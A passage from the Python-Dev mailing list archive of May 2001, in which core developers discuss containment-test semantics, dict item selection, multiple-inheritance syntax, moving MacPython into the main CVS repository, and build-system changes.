-0500 Subject: [Python-Dev] PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST." References: Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> In a checkin message, Tim wrote: > The full story for instance objects is pretty much unexplainable, because > instance_contains() tries its own flavor of iteration-based containment > testing first, and PySequence_Contains doesn't get a chance at it unless > instance_contains() blows up. A consequence is that > some_complex_number in some_instance > dies with a TypeError unless some_instance.__class__ defines __iter__ but > does not define __getitem__. This kind of thing happens everywhere -- instances always define all slots but using the slots sometimes fails when the corresponding __foo__ doesn't exist. Decisions based on the presence or absence of a slot are therefore in general not reliable; the only exception is the decision to *call* the slot or not. The correct solution is not to catch AttributeError and pretend that the slot didn't exist (which would mask an AttributeError occurring inside the __contains__ method if there was one), but to reimplement the default behavior in the instance slot implementation. In this case, that means that PySequence_Contains() can be simplified (no need to test for AttributeError), and instance_contains() should fall back to a loop over iter(self) rather than trying to use instance_item(). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Sat May 5 21:40:11 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 5 May 2001 16:40:11 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > This kind of thing happens everywhere -- instances always define all > slots but using the slots sometimes fails when the corresponding > __foo__ doesn't exist. Decisions based on the presence or absence of > a slot are therefore in general not reliable; the only exception is > the decision to *call* the slot or not. The correct solution is not > to catch AttributeError and pretend that the slot didn't exist (which > would mask an AttributeError occurring inside the __contains__ method > if there was one), Ya, it sucks. I was inspired by that instance_contains() itself makes dubious assumptions about what an AttributeError means when the functions *it* calls raise it . > but to reimplement the default behavior in the instance slot > implementation. The "backward compatibility" comment in instance_contains() was scary: compatibility with *what*? instance_contains() is pretty darn new. I assumed it meant there was *some* good (but unidentified) reason we had to use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if instance_item() "worked". But I haven't thought of one, except to ensure that some_complex in some_instance_with___getitem__ continues to blow up -- but that's not a good reason. So: > In this case, that means that PySequence_Contains() can be simplified > (no need to test for AttributeError), and instance_contains() should > fall back to a loop over iter(self) rather than trying to use > instance_item(). Will do! From guido@digicool.com Sat May 5 22:48:33 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 16:48:33 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400." References: Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> > [Guido] > > This kind of thing happens everywhere -- instances always define all > > slots but using the slots sometimes fails when the corresponding > > __foo__ doesn't exist. Decisions based on the presence or absence of > > a slot are therefore in general not reliable; the only exception is > > the decision to *call* the slot or not. The correct solution is not > > to catch AttributeError and pretend that the slot didn't exist (which > > would mask an AttributeError occurring inside the __contains__ method > > if there was one), [Tim] > Ya, it sucks. I was inspired by that instance_contains() itself makes > dubious assumptions about what an AttributeError means when the functions > *it* calls raise it . Actually, instance_contains checks for AttributeError only after calling instance_getattr(), whose only purpose is to return the requested attribute or raise AttributeError, so here it is safe: the __contains__ function hasn't been called yet. > > but to reimplement the default behavior in the instance slot > > implementation. > > The "backward compatibility" comment in instance_contains() was scary: > compatibility with *what*? With previous behavior of 'x in instance'. Before we had __contains__, 'x in y' *always* iterated over the items of y as a sequence, comparing them to x one at a time. The loop does that. > instance_contains() is pretty darn new. I > assumed it meant there was *some* good (but unidentified) reason we had to > use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if > instance_item() "worked". No, that was probably just an oversight -- clearly it should have used rich comparisons. (I guess this is a disadvantage of the approach I'm recommending here: if the default behavior changes, the reimplementation of the default behavior in the class must be changed too.) > But I haven't thought of one, except to ensure > that > > some_complex in some_instance_with___getitem__ > > continues to blow up -- but that's not a good reason. Indeed not. > So: > > > In this case, that means that PySequence_Contains() can be simplified > > (no need to test for AttributeError), and instance_contains() should > > fall back to a loop over iter(self) rather than trying to use > > instance_item(). > > Will do! Thanks! --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Sat May 5 22:24:58 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 5 May 2001 17:24:58 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Actually, instance_contains checks for AttributeError only after > calling instance_getattr(), whose only purpose is to return the > requested attribute or raise AttributeError, so here it is safe: the > __contains__ function hasn't been called yet. I'd say "safer", but not "safe": at that point we only know that *some* attribute didn't exist, somewhere, while attempting to look up "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ hook, like def __getattr__(self, attr): return global_resolver.resolve(self, attr) where global_resolver has lost its "resolve" attr. "except" clauses aren't more bulletproof in C than in Python <0.9 wink>. > With previous behavior of 'x in instance'. Before we had > __contains__, 'x in y' *always* iterated over the items of y as a > sequence, comparing them to x one at a time. I don't believe I ever knew that! Thanks. I erronesouly assumed that the looping behavior was *introduced* when __contains__ was added. > ... > No, that was probably just an oversight -- clearly it should have used > rich comparisons. (I guess this is a disadvantage of the approach I'm > recommending here: if the default behavior changes, the > reimplementation of the default behavior in the class must be changed > too.) I factored out the new iterator-based __contains__ logic into a new private API function, called when appropriate by both PySequence_Contains() and instance_contains(). So any future changes to what iterator-based __contains__ means will only need to be made in one place. too-easy-ly y'rs - tim From guido@digicool.com Sat May 5 23:31:05 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 17:31:05 -0500 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400." References: Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> > [Guido] > > Actually, instance_contains checks for AttributeError only after > > calling instance_getattr(), whose only purpose is to return the > > requested attribute or raise AttributeError, so here it is safe: the > > __contains__ function hasn't been called yet. [Tim] > I'd say "safer", but not "safe": at that point we only know that *some* > attribute didn't exist, somewhere, while attempting to look up > "__contains__". Ignoring it could, e.g., be masking a bug in a __getattr__ > hook, like > > def __getattr__(self, attr): > return global_resolver.resolve(self, attr) > > where global_resolver has lost its "resolve" attr. "except" clauses aren't > more bulletproof in C than in Python <0.9 wink>. Yes, but attribute errors inside __getattr__ hooks are *always* a problem to debug, since raising AttributeError is part of its job. So this is not new. I should have said "as safe as it gets." > > With previous behavior of 'x in instance'. Before we had > > __contains__, 'x in y' *always* iterated over the items of y as a > > sequence, comparing them to x one at a time. > > I don't believe I ever knew that! Thanks. I erronesouly assumed that the > looping behavior was *introduced* when __contains__ was added. Surely you knew that "x in y" looped over the items of y? What else could it have done? It was only defined on sequences! > > ... > > No, that was probably just an oversight -- clearly it should have used > > rich comparisons. (I guess this is a disadvantage of the approach I'm > > recommending here: if the default behavior changes, the > > reimplementation of the default behavior in the class must be changed > > too.) > > I factored out the new iterator-based __contains__ logic into a new private > API function, called when appropriate by both PySequence_Contains() and > instance_contains(). So any future changes to what iterator-based > __contains__ means will only need to be made in one place. Cool. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Sat May 5 22:53:51 2001 From: tim.one@home.com (Tim Peters) Date: Sat, 5 May 2001 17:53:51 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > ... > Surely you knew that "x in y" looped over the items of y? What else > could it have done? It was only defined on sequences! What's a sequence ? I expect I assumed that enduring a Python method call for every element of an *instance* was so expensive that Python didn't bother implementing "in" for instances (just for builtin sequences like lists and strings etc). I *know* I assumed it was so expensive that I never tried it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting "if x in s" where s was a tuple, list or string of length no more than 4; for anything bigger I always used a dict or bisect). So it's a personal blind spot likely due to never looking in that direction. From paul@pfdubois.com Sun May 6 02:10:37 2001 From: paul@pfdubois.com (Paul F. Dubois) Date: Sat, 5 May 2001 18:10:37 -0700 Subject: [Python-Dev] multiple inheritance -- what I meant Message-ID: When I suggested a modification to the inheritance clause, class X (Y rename a as b, c as d, Z rename foo as bar): someone suggested this was the same as class X (Y, Z): b = Y.a d = Y.c bar = Z.foo I meant two things by my suggestion: 1. I meant that Y.a would never be found when searching for X.a. In particular, if Z.a exists, and a is not explicity defined in X, X.a is Z.a. 2. More philosophically, rather than being a consequence of the language like the second method is, the proposed syntax is intended to be a clear message to someone reading the class about how the inherited names are being handled. Compare the effort required of a reader to understand these two. (If you think the second one is easier, you probably attended Spam III.) If you can rename in this way there are no problems with multiple inheritance. To be complete you should probably also allow Y undefine x, ... which simply makes Y.x unavailable from X. From Greg.Wilson@baltimore.com Sun May 6 17:26:00 2001 From: Greg.Wilson@baltimore.com (Greg Wilson) Date: Sun, 6 May 2001 12:26:00 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Has anyone else found themselves wanting a method that chooses and returns a dictionary element at random, without removing it (as popitem does)? Or is there some way to tell popitem to return a value without mutating the container? If neither, would this be useful, or is it DHG? Thanks Greg From tim.one@home.com Sun May 6 19:15:57 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 6 May 2001 14:15:57 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: [Greg Wilson] > Has anyone else found themselves wanting a method that > chooses and returns a dictionary element at random, Do you mean "random" or "arbitrary"? "random" means every dict entry is equally likely to be chosen; "arbitrary" means nothing is defined about the result (except that it *is* a dict entry). random is much more expensive to implement (under the covers it's a vector, but a vector with holes, so you can't just pick a *slot* at random then "slide over" to the first non-hole (else a given entry's chance of being selected would be proportional to the # of contiguous holes adjacent to it)). > without removing it (as popitem does)? Note that, in the sense above, popitem() returns an arbitrary element. > Or is there some way to tell popitem to return a value without > mutating the container? No. Easy to write an efficient function that does, though: def arb(dict): k, v = pair = dict.popitem() dict[k] = v # restore the entry return pair Given the new dict iterators in 2.2, there's an easier fast way that doesn't mutate the dict even under the covers: def arb(dict): if dict: return dict.iteritems().next() raise KeyError("arb passed an empty dict") > If neither, would this be useful, or is it DHG? Do you have a particular algorithm, or class of algorithms, in mind for which it is useful? popitem's current behavior is most useful for me in the set algorithms I've used, usually in the form: while working_set: x, dontcare = working_set.popitem() process(x) # which may add more elts to working_set From jack@oratrix.nl Mon May 7 10:39:43 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:39:43 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Folks, now that there's finally a decent (well, somewhat decent:-) Mac CVS client that supports ssh I'd like to move MacPython to sourceforge. There's two ways I can go about this: start a new MacPython project or merge the MacPython stuff into the main Python CVS repository. The Mac specific stuff for Python is all concentrated in a single subtree Mac of the main Python tree (the subtree has its own hierarchy of Python/Modules/Lib/etc directories), so putting it in the main repository should not pollute the filenamespace all that much. It would also have the advantage that a single "cvs update" would update everything (whereas the current situation for Mac developers, where Python/Mac is from a different CVSROOT than Python, does not have that advantage). The downside is that everyone who does a full checkout of the tree would get an extra 1000 or so files on their disk that are pretty useless unless they have a mac. Oh yes, another plus for putting stuff in the main repository is MacOSX support. Some MacPython modules have been "ported" to MacOSX, and I've started on adding them to setup.py, and life would become a lot simpler for people compiling on MacOSX if they had everything available automatically. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack@oratrix.nl Mon May 7 10:45:59 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:45:59 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup of Python does not allow for an easy addition of a platform-dependent sourcefile to the core interpreter (or am I missing something?). This is a bit of functionality I need to port the various Mac modules to MacOSX-python. The platform depende sourcefile has various glue routines for turning MacOS error codes into exceptions and that sort of stuff. Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack@oratrix.nl Mon May 7 10:49:17 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:49:17 +0200 Subject: [Python-Dev] Need a search path for modules in setup.py Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl> (Don't worry, this is the last in my flurry of OSX related messages:-) Life would be a lot simpler for me if setup.py (the one for the main extension modules) would have a search path for module sourcefiles. As Mac modules currently live in Python/Mac/Modules (as opposed to Python/Modules) not having a search path measn I get ugly "../Mac/Modules/foomodule.c" constructs. I have the code for setup.py ready, is it OK if I check it in? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From loewis@informatik.hu-berlin.de Mon May 7 10:53:54 2001 From: loewis@informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 7 May 2001 11:53:54 +0200 (MEST) Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> > There's two ways I can go about this: start a new MacPython project > or merge the MacPython stuff into the main Python CVS repository. There is actually a third option: Use the Python SF project, but create a new module in the Python CVS repository (so no merging would be done). I don't know how much code this is. I'd favour merging the Mac code into the core distribution. If there are loads of Mac-specific modules that not every MacPython user needs, it might be advisable to create a distutils package that contains the extra modules. Such a package should still live in cvs.python.sourceforge.net:/cvsroot/python. Just my 0.02EUR, Martin From guido@digicool.com Mon May 7 15:00:08 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 07 May 2001 09:00:08 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200." <200105070953.LAA14803@pandora.informatik.hu-berlin.de> References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com> [Jack] > > There's two ways I can go about this: start a new MacPython project > > or merge the MacPython stuff into the main Python CVS repository. We have platform-specific subdirectories for so many projects that it's a shame we don't have the Mac code in there as well! The only (small) advantage I can imagine of a separate MacPython project would be that you (Jack) can more easily give others commit permission to the Mac tree without giving them commit permission to all of Python (which requires they gain the trust of a larger group of Python developers). Of course, I don't know if you expect much help from others who are not already Python developers. [Martin] > There is actually a third option: Use the Python SF project, but > create a new module in the Python CVS repository (so no merging would > be done). I don't know much about modules, but would this allow Jack to check out the main code and the MacPython code into a single work directory (which he needs)? If so, it may be the best solution. Note that no matter how you do it, you'll have to submit a tree of RCS files to the SF sysadmins to load, unless you want to lose years of MacPython cvs logs... > I don't know how much code this is. I'd favour merging the Mac code > into the core distribution. If there are loads of Mac-specific modules > that not every MacPython user needs, it might be advisable to create a > distutils package that contains the extra modules. Such a package > should still live in cvs.python.sourceforge.net:/cvsroot/python. Undecidedly yours, (Jack, regarding your Makefile and setup.py changes: I'd wait for opinions on your patches from Neil and Andrew. I don't see why they would have an objection to adding these features, but the specific implementation you propose might be subject to comments.) --Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Mon May 7 14:04:15 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Mon, 7 May 2001 08:04:15 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl> References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <15094.40271.461338.638822@beluga.mojam.com> Jack> ... I'd like to move MacPython to sourceforge. There's two ways I Jack> can go about this: start a new MacPython project or merge the Jack> MacPython stuff into the main Python CVS repository. I say merge. Skip From nas@python.ca Mon May 7 14:14:52 2001 From: nas@python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:14:52 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200 References: <20010507094600.217CE312BA0@snelboot.oratrix.nl> Message-ID: <20010507061452.A23494@glacier.fnational.com> Jack Jansen wrote: > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > of Python does not allow for an easy addition of a platform-dependent > sourcefile to the core interpreter (or am I missing something?). No, its still a big ugly hack. :-) > This is a bit of functionality I need to port the various Mac > modules to MacOSX-python. The platform depende sourcefile has > various glue routines for turning MacOS error codes into > exceptions and that sort of stuff. > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? How would this work? Would MACHDEP_OBJS be set by an autoconf subsitution? Neil From jack@oratrix.nl Mon May 7 14:17:18 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:17:18 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Guido van Rossum , Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com> Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> > We have platform-specific subdirectories for so many projects that > it's a shame we don't have the Mac code in there as well! Great! I'll pack up my repository and send it to the sourceforge-powers-that-be shortly. The write permission for other MacPython developers shouldn't be a problem, I think Just is currently the only person with write permission (but I have to check). > (Jack, regarding your Makefile and setup.py changes: I'd wait for > opinions on your patches from Neil and Andrew. I don't see why > they would have an objection to adding these features, but the > specific implementation you propose might be subject to comments.) Definitely. I'll put them up as patches and then see what happens. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From jack@oratrix.nl Mon May 7 14:27:14 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:27:14 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: Message by Neil Schemenauer , Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com> Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl> > Jack Jansen wrote: > > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > > of Python does not allow for an easy addition of a platform-dependent > > sourcefile to the core interpreter (or am I missing something?). > [...] > > > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? > > How would this work? Would MACHDEP_OBJS be set by an autoconf > subsitution? Yes, that's what I had in mind (haven't written the code yet). Similar to the way DYNLOADFILE is set, but empty for all platforms except for OSX. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From nas@python.ca Mon May 7 14:30:42 2001 From: nas@python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:30:42 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200 References: <20010507132714.B0808312BA1@snelboot.oratrix.nl> Message-ID: <20010507063042.D23494@glacier.fnational.com> Jack Jansen wrote: > Yes, that's what I had in mind (haven't written the code yet). Similar to the > way DYNLOADFILE is set, but empty for all platforms except for OSX. Sounds good to me. Try to keep the code somewhat general so that other platforms may use it. Neil From mal@lemburg.com Mon May 7 19:44:55 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Mon, 07 May 2001 20:44:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com> Message-ID: <3AF6ED27.FB2C077B@lemburg.com> Guido van Rossum wrote: > > > I've attached the patch. Due to a small reorganisation the > > patch is a little longer -- symmetry has its price at C level > > too ;-) > > Looks good on paper, so go ahead and check it in. Watch out for > potential changes caused by Tim's iter-crusade! :-) OK. I'll look into this later this week. > While you're at it, why don't you check in the rot13 codec you posted > -- it's good to have simle examples in the standard library. > It would also be cool to have codecs for common file encodings like > base64, quoted-printable, binhex, uuencode, and even hex > (binascii.hexlify). Right. I'll add these in the next few weeks -- as time comes along. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From martin@loewis.home.cs.tu-berlin.de Mon May 7 22:21:27 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 7 May 2001 23:21:27 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de> > I don't know much about modules, but would this allow Jack to check > out the main code and the MacPython code into a single work > directory (which he needs)? Using CVS modules allows to merge parts of the tree into a single sandbox. E.g. you could do macpython python/dist/src &Mac 'cvs co macpython' then would give you a dist/src directory, which also contains a Mac directory (where Mac is another module, alongside with /python, or a CVSROOT/modules entry). You could use an exclude list, e.g. macpython !PC !PCbuild !RISCOS python/dist/src &Mac What you *cannot* do is to merge modules on a per-directory basis; all files in a single directory must come from the same CVS module - you can think of ampersand modules similar to Unix mount(1)ed file systems. Regards, Martin From tim.one@home.com Tue May 8 05:14:22 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 8 May 2001 00:14:22 -0400 Subject: [Python-Dev] Help with SF bug 105470 Message-ID: An ancient bug just got (re?)discovered on c.l.py, which I entered into SF: http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470& atid=105470 This has to do w/ gross loss of precision in manifest Python float constants, if and only if a module is loaded from .pyc or .pyo format. Since's it's fp-related, and fp is tricky x-platform, I'd like some volunteers to test this before I check it in. Current CVS Python contains a dormant test case. There's a patch attached to the bug report that activates the test case, and tries to repair the problem. After the patch, the fix works if and only if test_import doesn't fail, neither after deleting all .pyc/.pyo files first, nor if run a second time w/o deleting .pyc/.pyo. Works on Win98SE, but you may have already guessed that . From tim.one@home.com Tue May 8 05:52:37 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 8 May 2001 00:52:37 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Message-ID: [Jeremy Hylton, on python-checkins] > ... > XXX When should nested scopes by made non-optional on the trunk? Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're have trouble sleeping tonight . From thomas@xs4all.net Tue May 8 11:14:20 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 12:14:20 +0200 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400 References: <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org> Message-ID: <20010508121420.Y16486@xs4all.nl> On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote: > >>>>> "JE" == Jeff Epler writes: > | Why not let us spell this as: > | class X(Y): > | from Y import foo as _sfoo, bar as _sbar > | ... > NS> This already has a meaning in Python. Paul's suggested syntax > NS> is pretty neat, IMHO. > Not if Y is a class though, right? That would currently raise an > ImportError, ... Nope: >>> class string: ... pass ... >>> from string import split >>> string >>> That could be considered a misfeature for more than one reason (like importing from non-module objects, which you now do by inserting the object into sys.modules) but can't be fixed without breaking backward compatibility, except by inventing new syntax. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From Mark.Favas@per.dem.csiro.au Tue May 8 11:34:37 2001 From: Mark.Favas@per.dem.csiro.au (Favas, Mark (EM, Floreat)) Date: Tue, 8 May 2001 18:34:37 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> A change to termios.c in the last couple of days to #include termio.h as well as termios.h breaks the build on FreeBSD, which has only termios.h - needs an autoconf test? There'll probably be other similar systems. Cheers, Mark From thomas@xs4all.net Tue May 8 12:36:38 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 13:36:38 +0200 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: ; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: <20010508133638.Z16486@xs4all.nl> On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote: > Given the new dict iterators in 2.2, there's an easier fast way that doesn't > mutate the dict even under the covers: > def arb(dict): > if dict: > return dict.iteritems().next() > raise KeyError("arb passed an empty dict") You probably want: arb = dict.iteritems().next so that you don't keep on returning the same key,value pair. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas@xs4all.net Tue May 8 13:10:00 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:10:00 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200 References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <20010508141000.A16486@xs4all.nl> On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote: > The Mac specific stuff for Python is all concentrated in a single subtree Mac > of the main Python tree (the subtree has its own hierarchy of > Python/Modules/Lib/etc directories), so putting it in the main repository > should not pollute the filenamespace all that much. It would also have the > advantage that a single "cvs update" would update everything (whereas the > current situation for Mac developers, where Python/Mac is from a different > CVSROOT than Python, does not have that advantage). The downside is that > everyone who does a full checkout of the tree would get an extra 1000 or so > files on their disk that are pretty useless unless they have a mac. I'd say merge, except that the number '1000' is very large. Is it really 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 .py files spread out over the tree (567 of which in Lib, the rest in Demo/Tools) and obviously some misc files and CVS stuff, for a total of around 2500 files. Is that 1000 a real number ? No temp files, auto-generated files, .o files etc ? How large are they ? (the average size in the current CVS tree is about 10k) I'd probably still say 'merge', I'm just curious where the large number of files comes from. Is it to keep the changes to the original files minimal ? Given the number of platform-dependant #ifdefs and differently-defined macro's we're using now, I don't see why some of those changes couldn't be moved into the original files, if that's the case. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas@xs4all.net Tue May 8 13:13:39 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:13:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200 References: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> Message-ID: <20010508141339.B16486@xs4all.nl> On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote: > > We have platform-specific subdirectories for so many projects that > > it's a shame we don't have the Mac code in there as well! > Great! I'll pack up my repository and send it to the > sourceforge-powers-that-be shortly. The write permission for other MacPython > developers shouldn't be a problem, I think Just is currently the only person > with write permission (but I have to check). That doesn't mean there isn't a problem. Just doesn't have write access :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From guido@digicool.com Tue May 8 14:35:50 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:35:50 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400." References: Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com> > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes by made non-optional on the trunk? [Tim] > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're > have trouble sleeping tonight . +1. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Tue May 8 14:41:42 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:41:42 -0500 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800." <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com> > A change to termios.c in the last couple of days to #include termio.h as > well as termios.h breaks the build on FreeBSD, which has only termios.h - > needs an autoconf test? There'll probably be other similar systems. Frankly, I don't see the point of including termio.h at all -- it seems to be a backwards compatibility file. Mark, can you please enter this in the bug database and assign it to whoever checked in the change? :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From nas@python.ca Tue May 8 15:05:01 2001 From: nas@python.ca (Neil Schemenauer) Date: Tue, 8 May 2001 07:05:01 -0700 Subject: [Python-Dev] RE: [Python-checkins] 